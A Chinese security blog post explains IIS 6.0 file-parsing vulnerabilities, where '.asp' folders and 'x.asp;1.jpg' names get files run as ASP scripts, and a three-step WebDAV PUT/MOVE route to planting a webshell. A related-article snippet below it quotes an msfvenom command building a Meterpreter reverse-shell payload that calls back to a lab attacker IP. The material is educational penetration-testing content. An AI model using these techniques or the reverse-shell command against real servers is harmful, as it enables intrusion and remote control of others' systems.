文件解析漏洞(IIS、WebDav)

最新推荐文章于 2024-07-30 22:24:29 发布
最新推荐文章于 2024-07-30 22:24:29 发布
阅读量831 收藏
点赞数
分类专栏: 安全漏洞 文章标签: 安全漏洞 安全 信息安全 渗透测试 测试类型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zHx981/article/details/112244744
版权

IIS文件解析漏洞

IIS6.0在解析文件时存在两个解析漏洞

1.当建立*.asp、*.asa格式的文件夹时,其目录下的任意文件都将被IIS当作asp文件进行解析。

例如:建立一个文件夹test.asp,在test.asp文件夹中新建一个文本文档1.txt,其内容为一句话木马。(正常来说TXT是文本文档格式,IIS是不会去解析此类文件的,应该会直接显示其内容,而在test.asp文件夹中,却直接会被当做ASP脚本来进行解析。

访问 /test.asp/1.txt 会显示你放入的一句话木马。

2.当文件为*.asp;1.jpg 的时候,IIS6.0同样会以ASP脚本来进行执行。

例如:新建文件test.asp;1.jpg内容为一句话木马。

访问/test.asp;1.jpg 依旧会显示你放入的一句话木马。

这个漏洞已经出现很久了,但是微软一直也没有提供解决IIS6.0这个问题的补丁,很多网站栽在这个漏洞。

IIS容器中还有一个经典漏洞WebDav

WebDav是一种基于HTTP1.1协议的通信协议,它扩展了HTTP协议,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法,使HTTP协议更强大。在开启WebDav扩展的服务器之后,如果支持PUT、MOVE、COPY、DELETE等方法,就可能会存在一些安全隐患。攻击者就可能通过PUT方法向服务器上传危险脚本文件。

第一步:通过OPTIONS探测服务器所支持的HTTP方法

第二步:通过PUT方法向服务器上传脚本文件

第三步:通过MOVE或COPY方法改名

通过这三个步骤,攻击者就能轻松的获取一个WebShell

如果服务器开启了DELETE方法,攻击者还可以删除服务器上的任意文件。

zHx981
关注
专栏目录
WebDav漏洞简单分析及通用exploit设计
FreeXploiT
10-29 2200
WebDav漏洞简单分析及通用exploit设计    拜读了isno写的>、>,以及Nankia写的>之后,用他们发布的exploit、以及能在网上找到的exploit在我的一些测试机上测试,有些成功,有些不成功。于是便想自己调试一下。在后来的调试过程中,参考了大量资料,特别是yuange所写的>。在这过程中我学到了很多东西,自己也有些心得体会,其中可能有不少错误的地方,于是便想写下来,一来请各
Windows WebDAV服务漏洞复现+利用+修复
weixin_62485906的博客
03-18 630
安装服务的时候要安装WebDAV。在靶机web目录写马。禁用WebDAV服务。
python创建一个目录_生成一个运行sDist的目录并创建一个空的sDist包
weixin_30019895的博客
12-24 629
创建了一个安装文件。用下面的代码设置.py是import sysfrom distutils.core import setupsetup(name='SomePackage',author='dave',version='0.1.0',author_email='dave',packages=['apples',],license='LICENSE.txt',url="None",include...
文件解析漏洞总结(IIS,NGINX,APACHE)
最新发布
2301_76631050的博客
07-30 1121
这个解析漏洞其实是PHP CGI的漏洞,在PHP的配置文件中有一个关键的选项cgi.fix_pathinfo默认是开启的,当URL中有不存在的文件,PHP就会向前递归解析。在一个文件/xx.jpg后面加上/.php会将 /xx.jpg/xx.php 解析为 php 文件。在IIS7.0和IIS7.5版本下也存在解析漏洞,在默认Fast-CGI开启状况下,在一个文件路径/xx.jpg后面加上/xx.php会将/xx.jpg/xx.php 解析为 php 文件。.jpg会被服务器看成是1.asp。
WebDav服务器漏洞利用
奇葩
12-06 3167
参考链接:https://charlesreid1.com/wiki/Metasploitable/Apache/DAV 生成php后门 将php后门,通过dav上传到服务器中 服务器中就多了一个文件 使用msf 点击web的文件,使得反射payload生效 入侵靶机成功 ...
IIS 6.0 WebDAV远程代码执行漏洞利用(CVE-2017-7269)
mirror97black的博客
01-24 4299
漏洞简介 漏洞编号:CVE-2017-7269 发现人员:Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院) 漏洞简述:开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行,目前针对 Windows Server 2003 R2 可以稳定利用,该漏洞最早在2016年7,8月份开始在野外被利用。 漏洞类型:缓冲区溢出 漏洞
IIS6.0文件解析漏洞
龙狼刺的博客
05-11 6322
目录 一、相关知识 1、IIS6.0解析漏洞介绍 2、IIS6.0PUT上传原理 3、IIS6.0解析文件类型 4、IIS6.0文件解析漏洞修复方案 二、环境配置 三、文件上传 1、设置代理 2、靶机环境配置 3、截取数据包 4、探测漏洞 5、创建文件,并写入一句话木马 6、复制文件并重命名,绕过拦截 四、蚁剑连接 一、相关知识 1、IIS6.0解析漏洞介绍 (1)当建立*.asa、*.asp格式的文件夹时,其目录下的任意文件都将被IIS当做asp文件解析。...
第一节 中间件解析漏洞-IIS6.0-01
09-15
漏洞存在于IIS6.0服务器的解析机制中,当建立*.asa、*.asp格式的文件夹时,其目录下的任意文件都将被IIS当作asp文件解析。例如,建立一个名为"test"的文件夹,并在其中创建一个名为"1.jpg"的文件IIS6.0将其解析...
IIS6x任意文件写入漏洞
qq_44905657的博客
12-20 730
IIS 6x——任意文件上传漏洞
IIS6.0漏洞学习-PUT漏洞和短文件解析漏洞
willow_liang的博客
10-20 662
简介 IIS是Internet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。最初是Windows NT版本的可选包,随后内置在Windows 2000、Windows XP Professional和Windows Server 2003-起发行,但在Windows XP Home版本_上并没有IISIIS是一 -种Web (网页)服务组件,其中包括Web服务器、FTP服务器、 NNTP服务器和SMTP服
IIS中间件四大漏洞分析
fansenliangren的博客
12-27 960
关于IIS中间件四大漏洞漏洞原理,漏洞危害,检测条件,检测方法,和修复建议的简要介绍。
IIS 6.0 WebDAV远程代码执行漏洞利用(CVE-2017-7269)-附件资源
03-05
IIS 6.0 WebDAV远程代码执行漏洞利用(CVE-2017-7269)-附件资源
WebDAVScan-WebDAV漏洞扫描器
10-31
WebDAV漏洞扫描器 扫描系统中是否存在WebDAV漏洞
python手动安装包_python setup.py sdist或者install 打包和安装第三方包
weixin_39942108的博客
11-24 407
一、引入内容:python setup.py sdist 将自己的python文件打包python setup.py install安装第三方包二、问题是setup.py是用来做什么的有什么作用?setup.py文件可以对module文件进行打包和安装详情如下:打包module需要新建一个setup.py的脚本(作者自己建的),然后在脚本中输入下面的代码,假设你要打包的module名称为st...
【小迪实地】Webdav安全配置相关与漏洞利用
玫瑰安全
05-17 9028
0x00 简介 WebDAV是一种基于 HTTP 1.1协议的通信协议.它扩展了HTTP 1.1,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法。 使应用程序可直接对Web Server直接读写,并支持写文件锁定(Locking)及解锁(Unlock),还可以支持文件的版本控制。 IIS实现Webdav是采用的其两种接口CGI、ISAPI的ISAPI
Microsoft IIS WebDAV安全漏洞修复参考
煜铭2011
04-27 3366
0x01 漏洞简介 Windows Server是微软发布的一系列服务器操作系统。Internet Information Services(IIS)是一套运行于Microsoft Windows中的互联网基本服务。Microsoft Windows Server 2003 R2中的IIS 6.0版本中的WebDAV服务的‘ScStoragePathFromUrl’函数
CVE-2016-0051(WebDaV)漏洞复现
yangbz123的博客
08-08 1678
MS16-016(WebDaV)漏洞复现 目标机:win7x64 192.168.235.142 攻击机:kali 192.168.235.137 1、 确定目标主机和攻击机能够ping通 2、 启动kaliLinux终端利用msfvenom生成后门 输入命令msfvenom -p(-p用来设置参数的) windows/meterpreter/reverse_tcp LHOST=192.168.235.137(LHOST用来设置本地主机ip) LPORT=2222(LPORT=2222用来设置本地监听端
WebDav远程溢出漏洞分析
CC's Blog
09-06 3777
文章来源:http://www.xfocus.net WebDav远程溢出漏洞分析 by isno@xfocus.org 一、漏洞分析     这个漏洞可能是前些年就有牛人发现了的,不过一直没公布,直到最近微软出了安全公告大家才知道原来有这么个漏洞。虽然WebDav是通过IIS来利用这个漏洞的,但是漏洞本身并不是IIS造成的,而是ntdll.dll里面的一个API函
〖教程〗LadonExp使用IIS写权限Webdav漏洞复现
K8哥哥
08-16 637
LadonExp生成器使用教程之IIS写权限漏洞利用,含环境配置、EXP生成、批量利用、Pyhton复现代码。 漏洞成因 该漏洞的产生原因来源于服务器配置不当造成,此漏洞主要是因为服务器开启了webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。 IIS配置 1 启用webdav组件 2 目录给写权限(为了方便直接eveyone完全写入权限) 3 脚本资源访问权限(不然MOVE失败即无法GetShell) 漏洞复现 使用LadonEXP可轻松复现
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

zHx981

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值